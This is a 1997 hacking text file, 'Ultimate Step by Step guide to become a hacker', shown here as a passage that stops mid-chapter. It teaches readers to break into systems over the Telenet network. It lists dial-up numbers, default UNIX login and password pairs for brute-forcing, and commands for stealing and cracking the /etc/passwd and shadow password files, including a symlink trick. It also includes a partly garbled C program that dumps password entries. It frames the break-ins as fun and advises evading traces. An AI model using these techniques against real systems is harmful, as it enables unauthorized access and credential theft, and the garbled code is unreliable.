Welcome To ScaR|FacE's Hacking Page -here you can learn step By Step how to become a hacker! Ultimate Step by Step guide to become a hacker =============================================== Submitted to the Hideout by IceKool Document Modified by kM June 16th, 1997 Disclaimer: I do not take any responsibilities for actions that you pose using this file. Therefore do not blame me for whatever happens. This is for informational purposes only. About the Author: My name is IceKool. I live in Va. I love to hack and I hope that this file will teach you everything that you need to know. So read it all the way through! Contents: 1.) What should I know about hacking and where can I get started? 2.) What programs will I need? 3.) I got the stuff, what now? 4.) A list of telenet numbers. 5.) I dialed it out, now what? 6.) How do NUA's work? 7.) Help with NUA's 8.) What should I do once I found a system? 9.) I'm in, now what? 10.) Cracking programs, what they do and how they work. 11.) UNIX. 12.) Password shadowing. 13.) Dialouts 14.) Scanners 15.) Brute force hacking 16.) C-script to erasing your logins 17.) Keeping yourself safe 18.) NUA's that I have found 19.) Conclusion and Hackers Manifesto Chapter 1.) What should I know about hacking and where can I get started? Welcome to the world of hacking. You are probably asking why you want to be a hacker right now. Well, first let me say that if you saw the movie,"Hackers" don't think that that is hacking. It would be great if they had terminals that automatically put you in a system and gave out all those cool colors and welcome screens, but it's not that way. In fact, hacking is like using DOS and C commands. So if you want to be a hacker, realize that. Don't worry, it's still really cool. But before you start, let's identify things, first off a terminal. This is what you will use to hack. Click on ,"find" on the start menu of win95. Then type in ,"Terminal". It will either give you a hyper terminal or a terminal. Both will work. I prefer the hyper terminal. Choose the regular looking icon that says,"hyperterm" if you are using the HyperTerminal after you click on its folder. If you want to use the regular terminal, choose,"terminal". Now you will need to set some things. In terminal, click on settings. Then click on communications. You will have to mess with this stuff a little bit because some systems use different paritys and databits, etc. What I use is as follows: Baud rate: 19200 parity: odd databits: 7 flow control:Xon/Xoff For the hyper terminal, click on the HyperTerminal folder in the find files or folders thing. Choose hyperterm. Then it will ask you for a name. Call it anything you want. Now it will ask for a phone #. Don't type a phone number in, look at the bottom. It should say what type of modem you are using. Click on that and choose the com port that your modem is using. Do the settings that I listed above and hit ok. Now comes the part where you will need to use certain commands that work for both programs. It will connect to your modem and then you can tell your modem what to do. Here are the commands that you can type. By the way, put "AT" before everything except if you use "a/" or "+++". at=ok atdp(phone number)=dials out the number specified using a pulse dial up. atdt(phone number)=dials out the number specified using a tone dial up. at e0=echo off(not recommended) at e1=echo on(recomended,shows what you type in your terminal!very important) at L0=speacker volume low at L1=higher speaker volume at L2=default, medium at L3=high speaker volume at a=lets a call be connected to your computer(note! you can wait in your terminal mode and it will start saying"ring""ring""ring", type that command in and hit enter. It Will connect whatever is calling you!) Chapter 2: What programs will I need? Well, I already mentioned about the terminal. That's your first program you should get. Now go to either of these two addresses on the web to get your hacking equipment: www.hackersclub.com/km or www.sodaphish.com The programs that you should get are as follows: A-dial(or any scanner)- a scanner that will dial every # from 0000-9999 in your local area. Cracker Jack- One of the best and fastest Crackers out there. John the Ripper is the best one w/Win95 Modem Jammer- makes your calls untraceable! Chapter 3: I got the stuff, now what? Study how the stuff works and go to your local library and get some books on the following systems: 1.) IRIS 2.) UNIX 3.) DEC/10 4.) NOD 5.) VAX Now get out your cracker and read the instructions on how it works and look at the dictionary that it comes with (should be "puffs.dic"). Go to the Hackerz Hideout(www.hackersclub.com/km) and go to the newbie section and download lesson 1. Read on how it works and play with it for a while. Now get out your terminal and get ready to dial up your local telenet number! Chapter 4:A list of telenet numbers to use throughout the u.s. This is a list of telenet numbers throughout the U.S.A. Telenet is a network that is used for many purposes. This is where most of your hacking will be done because hacking directly to an open system is very risky! But if you use telenet and go to an outdial (more on this later) then the chances are much less risky. So dial up your local telenet number and get ready to hack! AK 907 Prudhoe Bay 659-2777 (1,2) - AK 907 St Paul 546-2320 (1,2) - AK 907 Seward 224-3126 (1,2) - AK 907 Sitka 747-5887 (1,2) - AK 907 Soldotna 262-1990 (1,2) - AK 907 Talkeetna 733-2227 (1,2) - AK 907 Tanana 366-7167 (1,2) (300 BPS ONLY) AK 907 Valdez 835-4987 (1,2) - AK 907 Whittier 472-2467 (1,2) - AK 907 Yakutat 784-3453 (1,2) - AZ 602 Phoenix 254-1903 A AZ 520 Flagstaff 773-0588 B AZ 520 Tucson 620-0658 B AR 501 Fayetteville 442-0212 B AR 501 Ft Smith 782-2852 B AR 501 Hot Springs 623-3159 B AR 501 Little Rock 375-4177 B AR 501 Texarkana 772-6181 B CA 805 Bakersfield 631-0577 B CA 916 Chico 894-6882 B CA 909 Colton 824-5571 B CA 310 Compton 516-1007 C CA 510 Concord 687-0216 C CA 909 Corona 278-1211 B CA 916 Davis 753-4387 B CA 619 Escondido 738-0203 B CA 707 Eureka 444-3091 B CA 707 Fairfield 426-3860 B CA 510 Fremont 249-9220 B CA 209 Fresno 233-6928 B CA 714 Garden Grove 379-7400 B CA 818 Glendale 507-0511 B CA 510 Hayward 538-0623 B CA 805 Lancaster 949-7396 B CA 213 Los Angeles 937-5526 A CA 310 Marina Del Rey 306-3450 B CA 209 Merced 383-2557 B CA 209 Modesto 576-2852 B CA 408 Monterey 655-1925 C CA 707 Napa 257-0217 B CA 310 Norwalk 802-2275 C CA 510 Oakland 836-3844 B CA 619 Oceanside 430-0613 C CA 619 Palm Springs 343-3470 B CA 415 Palo Alto 856-4854 B CA 510 Pinole 724-0271 C CA 909 Pomona 626-1284 C CA 916 Redding 243-0690 B CA 916 Sacramento 851-0700 B CA 714 Saddle Brook Valley 458-0811 B CA 408 Salinas 443-8791 B CA 415 San Carlos 591-8578 B CA 619 San Diego 233-1025 B CA 415 San Francisco 247-9976 A CA 408 San Jose 294-9067 B CA 805 San Luis Obispo 543-3233 B CA 310 San Pedro 548-7146 B CA 415 San Rafael 499-1629 C CA 510 San Ramon 829-6705 B CA 714 Santa Ana 558-1501 B CA 805 Santa Barbara 965-3326 B CA 408 Santa Cruz 459-7735 B CA 805 Santa Maria 925-2969 B CA 707 Santa Rosa 523-1048 C CA 209 Stockton 478-0402 C CA 805 Thousand Oaks 449-1500 B CA 805 Ventura 650-9203 B CA 619 Victorville 951-2612 B CA 209 Visalia 627-1201 B CA 818 West Covina 331-6611 C CA 818 Woodland Hills 887-7420 B CO 719 Colorado Springs 632-0278 B CO 303 Denver 745-3285 A CO 303 Ft Collins 495-6799 B CO 970 Grand Junction 241-3004 C CO 970 Greeley 352-8563 B CO 719 Pueblo 542-4053 C CT 203 Bridgeport 332-7400 B CT 203 Danbury 778-2022 B CT 203 Hartford 560-1385 B CT 203 Middletown 344-8217 B CT 203 New Britain 225-7027 B CT 203 New Haven 624-5945 B CT 203 New London 440-0656 B CT 203 Norwalk 866-7404 B CT 203 Stamford 961-8371 B CT 203 Waterbury 759-1445 C DE 302 Dover 678-8328 B DE 302 Newark 292-0114 B DC 202 Washington 659-2733 A FL 407 Boca Raton 367-0732 B FL 941 Cape Coral 334-0071 C FL 407 Cocoa Beach 267-0800 B FL 904 Daytona Beach 252-1609 C FL 954 Ft Lauderdale 764-0318 B FL 407 Ft Pierce 466-4566 B FL 352 Gainesville 335-6697 B FL 904 Holly Hill 257-4770 B FL 904 Jacksonville 353-1137 B FL 941 Lakeland 680-3332 C FL 352 Leesburg 787-0799 B FL 407 Melbourne 725-9641 B FL 305 Miami 358-5349 A FL 941 Naples 263-3033 C FL 352 Ocala 351-3790 C FL 407 Orlando 246-0851 B FL 904 Panama City 763-8377 B FL 904 Pensacola 469-9688 C FL 954 Pompano Beach 941-5545 C FL 813 St Petersburg 327-7024 B FL 941 Sarasota 952-1152 C FL 904 Tallahassee 222-0533 B FL 813 Tampa 221-3713 B FL 904 Valparaiso 897-3421 B FL 407 West Palm Beach 820-9391 B GA 912 Albany 431-9384 C GA 706 Athens 548-9698 B GA 404 Atlanta 688-1212 A GA 706 Augusta 722-9877 B GA 706 Columbus 322-9386 B GA 404 Gainsville 532-9880 B GA 912 Macon 741-2108 C GA 706 Rome 234-1428 B GA 912 Savannah 236-2898 B HI 808 Oahu 536-3886 ... - HI 800 Other Islands 272-5299 (2) - ID 208 Boise 343-0957 B ID 208 Idaho Falls 529-0406 B ID 208 Lewiston 743-5885 C ID 208 Pocatello 232-1764 B IL 847 Arlington Heights 670-9522 B IL 708 Aurora 896-9802 B IL 618 Belleville 277-9551 B IL 309 Bloomington 828-1441 B IL 312 Chicago 938-5462 A IL 217 Decatur 429-6054 C IL 815 De Kalb 756-3455 B IL 847 Glencoe 835-1143 B IL 815 Joliet 722-9652 C IL 708 Lansing 474-9310 B IL 847 Libertyville 362-5718 B IL 708 Naperville 355-2910 B IL 309 Peoria 674-2344 B IL 815 Rockford 962-9523 B IL 217 Springfield 525-1590 B IL 217 Urbana 384-3322 B IN 812 Bloomington 331-8890 C IN 812 Evansville 422-2911 B IN 219 Ft Wayne 422-8013 B IN 219 Gary 881-1020 B IN 317 Indianapolis 299-2593 B IN 317 Kokomo 452-0073 C IN 317 Lafayette 742-5488 C IN 317 Muncie 288-1113 C IN 317 Richmond 935-7532 B IN 219 South Bend 288-2355 B IN 812 Terre Haute 235-5671 C IA 515 Ames 233-2603 C IA 319 Burlington 752-2516 B IA 319 Cedar Rapids 298-4600 B IA 319 Davenport 322-3361 C IA 515 Des Moines 288-4626 B IA 319 Dubuque 556-0783 C IA 319 Iowa City 339-0320 C IA 712 Sioux City 255-1545 C IA 319 Waterloo 232-0195 B KS 913 Lawrence 843-8124 B KS 913 Leavenworth 651-0015 B KS 913 Manhattan 537-0948 B KS 913 Salina 825-7900 B KS 913 Topeka 232-5507 B KS 316 Wichita 264-4211 B KY 502 Bowling Green 843-0632 B KY 502 Frankfort 875-2911 B KY 606 Lexington 231-7717 B KY 502 Louisville 583-1209 B KY 502 Owensboro 686-8107 B LA 318 Alexandria 445-1053 B LA 504 Baton Rouge 344-5105 A LA 318 Lafayette 233-6951 B LA 318 Lake Charles 436-0518 C LA 318 Monroe 345-0106 B LA 504 New Orleans 524-7442 A LA 318 Shreveport 424-2255 B ME 207 Augusta 622-7364 B ME 207 Brewer 989-3081 C ME 207 Lewiston 784-0105 C ME 207 Portland 761-9029 C MD 410 Annapolis 266-6851 B MD 410 Baltimore 244-0470 A MD 301 Frederick 293-9596 B MD 410 Gaithersburg 869-4191 MA 508 Attleboro 226-8956 B MA 617 Boston 338-0002 A MA 508 Brockton 583-3533 B MA 617 Dedham 326-4064 B MA 508 Fall River 677-4477 B MA 508 Framingham 620-1119 B MA 508 Lawrence 687-8252 B MA 617 Lexington 862-9124 B MA 508 Lowell 459-2350 B MA 508 New Bedford 990-3300 B MA 413 Northampton 586-0510 C MA 413 Pittsfield 499-7741 B MA 508 Salem 744-1559 B MA 413 Springfield 747-3700 B MA 508 Woods Hole 540-4085 C MA 508 Worcester 791-7630 B MI 313 Ann Arbor 741-8488 A MI 616 Battle Creek 961-9927 B MI 616 Bridgman 465-3248 B MI 313 Detroit 965-3011 A MI 810 Flint 767-3590 B MI 616 Grand Rapids 774-5958 B MI 517 Jackson 782-8111 C MI 616 Kalamazoo 381-3101 B MI 517 Lansing 482-0120 B MI 906 Marquette 228-4622 B MI 517 Midland 832-7068 B MI 616 Muskegon 726-5723 C MI 810 Pontiac 858-7109 B MI 810 Port Huron 982-8364 B MI 517 Saginaw 797-3822 B MI 810 Southfield 827-4710 B MI 616 Traverse City 946-2121 C MI 810 Warren 573-7300 B MI 313 Wayne 326-4210 B MN 218 Duluth 722-3029 B MN 507 Mankato 388-3780 B MN 612 Minneapolis 332-0033 A MN 507 Rochester 282-0555 C MN 320 St Cloud 253-1264 C MS 601 Hattiesburg 264-0815 B MS 601 Gulfport 863-0024 B MS 601 Jackson 354-5303 B MS 601 Meridian 482-2210 B MS 601 Port Gibson 437-8916 B MS 601 Starkville 324-2155 B MO 573 Columbia 499-0580 B MO 573 Jefferson City 634-8436 C MO 816 Kansas City 421-5783 A MO 314 St Charles 723-5179 B MO 816 St Joseph 279-4797 C MO 314 St Louis 421-1376 A MO 417 Springfield 831-0057 B MT 406 Billings 248-6373 C MT 406 Great Falls 771-0067 B MT 406 Helena 443-0527 B MT 406 Missoula 543-5575 C NE 308 Grand Island 381-2049 B NE 402 Lincoln 438-4305 B NE 402 Omaha 341-4622 B NV 702 Las Vegas 737-1752 B NV 702 Reno 824-3000 B NH 603 Concord 225-2566 B NH 603 Durham 868-2924 B NH 603 Manchester 647-2750 B NH 603 Nashua 880-0118 C NH 603 Portsmouth 431-7984 B NJ 609 Atlantic City 348-3233 B NJ 908 Freehold 780-2680 B NJ 201 Hackensack 488-1726 B NJ 609 Marlton 988-7800 B NJ 609 Merchantville 663-7730 B NJ 201 Morristown 605-1836 B NJ 908 New Brunswick 220-0405 B NJ 201 Newark 624-8843 A NJ 201 Passaic 777-2700 B NJ 201 Paterson 279-4515 B NJ 609 Princeton 799-2266 A NJ 201 Rahway 388-5288 B NJ 908 Red Bank 571-0003 B NJ 201 Roseland 227-6722 B NJ 908 Sayreville 525-9507 B NJ 201 Summit 701-0767 B NJ 609 Trenton 392-4100 B NJ 609 Vineland 696-3883 B NM 505 Albuquerque 246-8950 B NM 505 Las Cruces 526-9191 B NM 505 Santa Fe 473-3403 C NY 518 Albany 433-0092 B NY 607 Binghamton 773-2244 B NY 716 Buffalo 847-8181 B NY 516 Deer Park 254-6021 B NY 516 Hempstead 292-2820 B NY 607 Ithaca 273-2200 C NY 212 New York City 206-0256 A NY 716 Niagara Falls 282-3284 C NY 518 Plattsburgh 562-1890 C NY 914 Poughkeepsie 471-6728 B NY 716 Rochester 546-6998 B NY 315 Syracuse 448-0021 B NY 315 Utica 792-9962 B NY 914 White Plains 949-6878 B NC 704 Asheville 259-9945 B NC 910 Burlington 229-0032 B NC 704 Charlotte 332-4023 A NC 910 Fayetteville 323-5940 C NC 704 Gastonia 865-4708 B NC 910 Greensboro 299-6600 B NC 704 Hickory 326-9860 B NC 910 High Point 889-7494 B NC 910 North Wilkesboro 838-1663 C NC 919 Raleigh 781-9976 B NC 919 Res Tri Park 549-0542 B NC 919 Tarboro 823-7459 C NC 910 Wilmington 763-8292 C NC 910 Winston-Salem 785-9962 B ND 701 Fargo 235-9069 C ND 701 Grand Forks 775-7813 B ND 701 Mandan 663-6339 B OH 330 Canton 455-1700 B OH 513 Cincinnati 579-1593 A OH 216 Cleveland 575-0811 A OH 614 Columbus 461-8671 A OH 513 Dayton 461-4600 B OH 216 Elyria 322-8645 C OH 419 Findlay 422-8188 B OH 513 Hamilton 863-4116 B OH 330 Kent 678-8330 A OH 216 Lorain 960-1771 C OH 419 Mansfield 589-0276 C OH 419 Sandusky 627-0050 B OH 513 Springfield 324-1520 C OH 419 Toledo 255-7010 B OH 330 Warren 856-7265 C OH 330 Wooster 345-1023 B OH 330 Youngstown 743-2983 B OK 918 Bartlesville 336-6362 B OK 405 Lawton 353-0225 B OK 405 Oklahoma City 270-0028 B OK 405 Stillwater 743-1447 B OK 918 Tulsa 584-6935 B OR 503 Corvallis 754-0559 C OR 541 Eugene 683-5147 B OR 541 Hood River 386-4405 C OR 503 Klamath Falls 882-6282 B OR 541 Medford 772-3994 B OR 503 Portland 295-0337 A OR 503 Salem 375-3104 B PA 610 Allentown 770-6501 B PA 814 Altoona 949-0310 B PA 412 Butler 285-8721 B PA 717 Carlisle 249-9311 C PA 717 Danville 271-0102 C PA 814 Erie 459-9779 B PA 412 Greensburg 836-4771 B PA 717 Harrisburg 236-1186 B PA 814 Johnstown 535-3356 B PA 610 King of Prussia 265-2812 B PA 717 Lancaster 295-7128 C PA 215 Levittown 946-3469 B PA 412 Monroeville 856-1330 B PA 215 Philadelphia 854-0589 A PA 412 Pittsburgh 281-8326 A PA 610 Reading 375-6945 C PA 717 Scranton 341-5611 B PA 814 State College 231-1510 C PA 215 Warrington 343-6010 B PA 610 West Chester 436-7406 B PA 717 Wilkes-Barre 820-9755 B PA 717 Williamsport 494-1796 C PA 717 York 845-9717 B RI 401 Providence 453-5353 B RI 401 Newport 849-0229 B RI 401 North Kingston 295-7100 B RI 401 Woonsocket 765-0019 B SC 803 Charleston 723-7342 B SC 803 Columbia 254-0038 B SC 803 Florence 669-0042 B SC 864 Greenville 232-7832 B SC 803 Myrtle Beach 626-9134 B SC 864 Spartanburg 542-1653 B SD 605 Pierre 224-2257 B SD 605 Rapid City 348-2048 C SD 605 Sioux Falls 334-4953 B TN 615 Bristol 968-2480 C TN 423 Chattanooga 266-3066 B TN 615 Clarksville 552-0032 B TN 615 Johnson City 282-6645 C TN 615 Knoxville 523-4031 B TN 901 Memphis 525-5201 B TN 615 Nashville 726-1213 B TN 423 Oak Ridge 481-3590 C TX 915 Abilene 672-3902 B TX 806 Amarillo 373-2926 B TX 903 Athens 677-1712 C TX 512 Austin 929-0078 B TX 210 Brownsville 544-7073 C TX 409 Bryan 779-0713 C TX 512 Corpus Christi 888-7207 B TX 214 Dallas 653-0840 A TX 817 Denton 381-1897 C TX 915 El Paso 532-1912 B TX 817 Ft Worth 332-1015 A TX 409 Galveston 762-8076 B TX 713 Houston 228-0705 A TX 210 Laredo 724-1791 C TX 903 Longview 758-1161 C TX 806 Lubbock 765-9631 C TX 210 McAllen 631-8967 B TX 915 Midland 561-8931 B TX 409 Nederland 722-7162 B TX 915 San Angelo 944-0376 B TX 210 San Antonio 225-1191 B TX 903 Sherman 893-4995 B TX 817 Temple 773-9723 C TX 903 Tyler 597-8925 C TX 512 Victoria 572-3197 B TX 817 Waco 752-2681 C TX 817 Wichita Falls 322-3774 B UT 801 Logan 752-3421 B UT 801 Ogden 627-1640 C UT 801 Provo 371-0278 B UT 801 Salt Lake City 355-9030 B TX 903 Texarkana 794-4700 B VA 540 Blacksburg 552-9181 C VA 804 Charlottesville 977-5330 C VA 540 Covington 962-2217 C VA 540 Fredericksburg 371-0188 B VA 540 Harrisonburg 434-0374 C VA 703 Herndon 787-6719 B VA 804 Lynchburg 845-0010 C VA 804 Newport News 596-9232 B VA 804 Norfolk 626-3349 B VA 703 Occoquan 494-0836 B VA 804 Richmond 225-0021 B VA 540 Roanoke 857-4266........ B VT 802 Burlington 660-4795 B VT 802 Montpelier 223-0758 B VT 802 Rutland 775-1676 C VT 802 White River Junction 295-7631 C WA 206 Auburn 939-9982 B WA 360 Bellingham 733-2873 B WA 206 Everett 774-7466 C WA 360 Longview 577-3992 B WA 206 Lynwood 774-7466 B WA 360 Olympia 705-0769 C WA 509 Pullman 332-0172 B WA 509 Richland 943-6117 B WA 206 Seattle 625-1386 A WA 509 Spokane 747-2069 B WA 206 Tacoma 383-9488 B WA 360 Vancouver 693-6914 B WA 509 Wenatchee 663-9482 B WA 509 Yakima 575-1060 B WV 304 Charleston 346-0524 B WV 304 Clarksburg 622-6827 B WV 304 Huntington 523-2802 C WV 304 Morgantown 292-0492 C WV 304 Wheeling 233-7732 B WI 608 Beloit 362-5287 B WI 715 Eau Claire 836-0097 C WI 414 Green Bay 432-0346 B WI 414 Kenosha 552-9242 C WI 608 La Crosse 784-0560 B WI 608 Madison 257-8330 B WI 414 Milwaukee 271-2420 A WI 414 Neenah 731-9687 C WI 414 Racine 632-2174 C WI 414 Sheboygan 452-3995 C WI 715 Wausau 848-6044 B WI 414 West Bend 334-2206 B WY 307 Casper 265-8807 C WY 307 Cheyenne 637-3958 B WY 307 Laramie 721-5878 C Chapter 5: I dialed it out, now what? Here is what you will do. Remember how I told you those modem commands? Here is how you would dial if you have a pulse phone in Casper WY: atdp265-8807 For tone: atdt265-8807 Ok. It should make a modem noise. I'm sure you've heard this before unless you are really new to computers. Here is a list of commands that you can use in telenet: C-Connect D-disconnect Mail-mail Telemail-mail full-network echo (should be really good to use!) half-terminal echo(I don't recommend it, but try it and see what happens, just type"full"when your done) Stat-Shows network port Set-Select pad perimeters Cont-Continue Hangup-Hangs up Access-Telenet Account (Need username and password) Here is a trick that you can try. Once you have connected, hit enter twice; then it will tell you you've connected to telenet on a certain address. Now either hit enter once or type in the type of terminal you are using. It should give you a prompt that looks like this: @ Now Type in telemail. It will say that it is connected. Now type in"phones" for the username and password. It will run down with a list of things. Try everything out that looks interesting. You can also type in help at the login prompt and it will ask you for an organization and a password. That will give you a list of all the numbers that will connect you to telenet in the U.S.A. A good thing to remember! Whenever you connect to a system and it will ask you"login" or "ugi" or "user id", etc... before you get cocky, try typing some things in such as help, teach, learn,help login, help logon, systat, and some other commands that you can think of by yourself. Just type one of those in for the login name,or before it asks you to login and see what happens. Chapter 6: How do NUA's work? Well, NUA's are like little addresses that you can connect to when you are in telenet. The way it works is by typing in an area code and then typing in any number after- words. It would be something like this: ____ @540|798|- the number after-words -|-------- areacode That would be the area code of VA. There is also something that you might see in front of it. It would look like this: 03110 540 0079800 The number in front(03110) is the pad that you are connected to. This is very important because you cannot always connect to an NUA because it will not always have what is called reverse charging. Reverse charging is sort of like you dialing someone's number collect. But I will explain more about this in the Help with NUA's section. You probably noticed that there were some zeros in the 798 part. A lot of times you will find this in systems. But usually you can ignore this. You can also put a "c" in front of the NUA. It would look like this: @c540 798 Note! Whenever I put a @ in front of a number like I just did, don't type that in, all you would have to type would be "c540 798". That is just the prompt. Chapter 7: Help with NUA's Not to many things have worked with NUA's that I have found. Although you could try these commands at the login prompt: 1.) help 2.) learn 3.) list 4.) list users 5.) games 6.) List games 7.) help logon 8.) help login 9.) and anything else that comes to your mind. Use common sense. If you try connecting to an NUA and it says that there is reverse charging,you can get by this by either connecting to another pad that isn't long distance to that NUA or you can use what is called an NUI (Network User ID). The NUI is faster but they are very hard to find. I wouldn't even try it,but if you want to, here is what you would do. Say that you liked system: 201 432 You would put a coma after the NUA and type the user name and then type in a password. For example: 201 432,username,password I would stick to the pads rather than this, it is much easier. Although, there are plenty of systems that will except reverse charging, so I personally just leave them alone. There to much trouble. Another problem with NUA's is that you will try to connect to one and it will just sit there and stare in your face. You will always know that when this happens that there is not a system. It will probably always just sit there. If you get stuck like that for to long, telenet will knock you off. That is very annoying! But I finally found a way to get past this. All you have to do is hold down the shift key and hit the "2" button and then hit enter. Then it will bring you back to the "@" prompt. Now hit "d" and hit enter to disconnect. Now you're all set to try another NUA. Chapter 8: What should I do once I found a system? Your first objective is to identify what type of system you have found. There are 2 ways to do this. The first and easiest way is to look for a copy of the LOD (legion of doom) and it will have most all the info that you will need on identifying systems. The second and best way to do this is to go to your local library or bookstore and read up on all the systems you can. Basically,I am saying to get LOD's copy and look at the systems they are talking about and get books on those systems. Once you've identified the system, first try the defaults that you have. If your defaults worked, that's great, move on to the next chapter, if not, do some research in the library section of the hackers hideout on sniffing and spoof ID. Chapter 9: I'm in, now what? Well, I agree with LOD. I can't tell you what to do once you got inside the system. It is totally all up to you, you are the hacker which means that you are in command. I would recommend looking in the books that you got on the system that you are in and look at all of its useful commands. Try everything out, don't be afraid, you can't go any further unless you try different things out. Search the system to your desire. Have fun! Chapter 10: Cracking programs A while back I said something about Cracker Jack. That is the type of Cracker that I will be referring to. Cracker Jack comes with a dictionary called, "puffs.dic". In the next chapter you will learn how to obtain passwords in a UNIX system, so this will be very useful. Say you see some passwords you want to crack. It goes like this, a word is scrambled (encrypted). A cracker will take this word and look at it with its dictionary. here is a sample: akcihgn The dictionary will look at it and look at every word in the English language that has seven letters and has each of those very letters. A lot of times, you will get lots of possible words, but one of them is the real password! In this case, it is "hacking". Chapter11:UNIX Well, if you finally found your first UNIX, then this is going to be a treat! First of all, UNIX will greet you with a welcoming message and then will say, "Login". To login, all you have to do is type in some defaults. Here they are: login: root pw: root login: root pw: system login: root pw: sysop login: sys pw: sys login: sys pw: system login: daemon pw: daemon login: uucp pw: uucp login: tty pw: tty login: test pw: test login: unix pw: unix login: unix pw: test login: bin pw: bin login: adm pw: adm login: adm pw: admin login: admin pw: admin login: sysman pw: sysman login: sysman pw: sys login: sysman pw: system login: sysadmin pw: sysadmin login: sysadmin pw: system login: sysadmin pw: sys login: sysadmin pw: admin login: sysadmin pw: adm login: who pw: who login: learn pw: learn login: uuhost pw: uuhost login: guest pw: guest login: host pw: host login: nuucp pw: nuucp login: rje pw: rje login: games pw: games login: games pw: player login: sysop pw: sysop login: demo pw: demo When these defaults don't work, you will have to use brute force hacking which you will learn later on. What you will do is use the default for your login name, then use the list of passwords. For example: login: sysadmin password:(every password in the list) If sysadmin didn't work move to the next default and use every password, then to the next etc. Here is the list of defaults to use: adm admin ann anon anonymous/anonymous backup batch bin checkfsys daemon demo diag field ftp games guest/guest guest/anonymous help install listen lp lpadmin maint makefsys mountfsys network news nobody nuucp nuucpa operator powerdown printer pub public reboot rje rlogin root sa setup shutdown startup sync sys/sys sysadm sysadmin sysbin/sysbin sysbin/bin sysman system tech test trouble tty umountfsys user/user user1/user1 uucp uucpa visitor Once you are in, save the account to a floppy. To access the password file on UNIX, type in this command: etc/passwd Now download the password file. This can be done by typing "d". If you type in this command and nothing shows up, try typing in "cat_/etc/passwd". If that doesn't work, then the UNIX system might not have what is called a shell account. In that case, move on to a new system. Ok, If you got the passwd file downloaded, take it to your cracker and crack it. If you have trouble cracking it, make sure that you typed in the right dictionary (puffs.dic) and the file of the passwd. Now look at one of the accounts, it will probably have a list of words that could be the password. Try every word that it gives you, one of the words will definitely work! Now finally log on as that user and change his password. Well, you've done it! You own the account. If you want to go a little further, look for the password on the "sysadmin and root". You would login like this: login:root password:(password) login:sysadmin password:(password) I hope that that helps you out. Remember, if you logon as the superuser (root), you have total command over the whole system. So act normal and if anyone tries to talk to you, act like you would if you were the sysop (system administrator), and NEVER manipulate files! NOTE! This is what a passwd file will look like when you get it: John:234abc56:9999:13:John_Johnson:/home/dir/John:/bin/John. Here is what it is broken down: Username: John Encrypted password: 234abc56 User # 9999 Group# 13 Other information: John Johnson Home directory: /home/dir/John Shell:/bin/John Chapter12: Password Shadowing Unfortunately, today most all UNIX systems have what is called password shadowing. It is a type of security that the admins use to keep hackers out. The password is still encrypted but you can't see the encrypted passwords. Here are Three ways that I have heard of to get around this. The first one is simple, you find the shadowed passwords in a different directory. I will name the system, you type in what is on the right. That will enable you (hopefully to find the encrypted passwords)but first, here is how you can identify a shadowed password. Look at this list and notice how there is either a * or an X in the passwords place: root:*:0:3::: ftp:*:500:19::: aolbeta:*:295:20::: macbeta:*:297:20::: atropos:*:228:20::: In this case the * was in place for the encrypted password. Here is a sample of the other type I have seen: Cougar:X:5:9987:/home/dir/bin Now to defeat this here is the first way: UNIX Path Token ----------------------------------------------------------- AIX 3 /etc/security/passwd ! or /tcb/auth/files// A/UX 3.0s /tcb/files/auth/?/* BSD4.3-Reno /etc/master.passwd * ConvexOS 10 /etc/shadpw * ConvexOS 11 /etc/shadow * DG/UX /etc/tcb/aa/user/ * EP/IX /etc/shadow X HP-UX /.secure/etc/passwd * IRIX 5 /etc/shadow X Linux1.1 /etc/shadow * OSF/1 /etc/passwd[.dir|.pag] * SCO Unix #.2.x /tcb/auth/files// SunOS4.1+c2 /etc/security/passwd.adjunct ##username SunOS 5.0 /etc/shadow System V Release 4.0 /etc/shadow X System V Release 4.2 /etc/security/* database Ultrix 4 /etc/auth[.dir|.pag] * UNICOS /etc/udb * Here is the second way. This is more confusing because you need to understand what a loop is. I got this out of the Library section of the HackerZ Hideout. So you can look in there too if you want :) This trick will only work with certain systems. Notice how the loop works. It is very important to the hacker. If you can find anything on loops, read it! It is great knowledge to have,but even I have trouble understanding it. Once you are in a Unix system, and of course, the passwd file is shadowed, try typing in "ypcat /etc/passwd >~/passwd"instead of"etc/passwd". Now download the passwd file from your home dir. Here is the trick, type in: rm -f ~/.lastlogin ln -s ~/.lastlogin /etc/passwd Now logout and then back in so that you create a link. cat .lastlogin > passwd rm -f ~/.lastlogin That way is a little tricky, but read up on loops and maybe it will work out for you. Here is the third and final trick. It is probably the best way because supposedly, it works with everything. What you will do is write a C-script. For those of you who don't know what a C-script is, it is a program that you write out in the C language Such as C++. You can get C++ at the store or ask around to warez pups. They should have it. What you will do is write it out. Then what you will have to do is go and compile it. It shouldn't be to hard. Anyway, here is the script: struct SHADOWPW { /* see getpwent(3) */ char *pw_name; char *pw_passwd; int pw_uid; int pw_gid; int pw_quota; char *pw_comment; char *pw_gecos; char *pw_dir; char *pw_shell; }; struct passwd *getpwent(), *getpwuid(), *getpwnam(); #ifdef elxsis? /* Name of the shadow password file. Contains password and aging info* #define SHADOW "/etc/shadowpw" #define SHADOWPW_PAG "/etc/shadowpw.pag" #define SHADOWPW_DIR "/etc/shadowpw.dir" /* * Shadow password file pwd->pw_gecos field contains: * * ,,,, * * = Type of password criteria to enforce (type int). * BSD_CRIT (0), normal BSD. * STR_CRIT (1), strong passwords. * = Password aging period (type long). * 0, no aging. * else, number of seconds in aging period. * = Time (seconds from epoch) of the last password * change (type long). * 0, never changed.n * =Time (seconds from ephoch) That the current password * Was made the (type long). * 0, never changed.ewromsinm * = Password (encrypted) saved for an aging t * prevent reuse during that period (type char [20]). * "*******", no . */ /* number o tries to change an aged password */ #deffine CHANGE_TRIES 3 /* program to execute to change passwords */ #define PASSWD_PROG "/bin/passwd" /* Name of the password aging exempt user names and max number of entir #define EXEMPTPW "/etc/exemptpw" #define MAX_EXEMPT 100 /* Password criteria to enforce */ #define BSD_CRIT 0 /* Normal BSD password criteria */ #define STR_CRIT 1 /* Strong password criteria */ #define MAX_CRIT 1 #endif elxsi #define NULL 0 main() { struct passwd *p; int i; for (;1;) {; p=getpwent(); if (p==NULL) return; printpw(p); } } printpw(a) struct SHADOWPW *a; { printf("%s:%s:%d:%d:%s:%s:%s\n", a->pw_name,a->pw_passwd,a->pw_uid,a->pw_gid, a->pw_gecos,a->pw_dir,a->pw_shell); } /* SunOS 5.0 /etc/shadow */ /* SunOS4.1+c2 /etc/security/passwd.adjunct */ Chapter13: Dial outs A NUA can sometimes connect you to what is called an outdial. An outdial is a modem that you can get to through the NUA. A good use for this is to use a scanner and dial every # from 0000-9999 on a 3-digit prefix in your area for a list of computers you can hack into. You 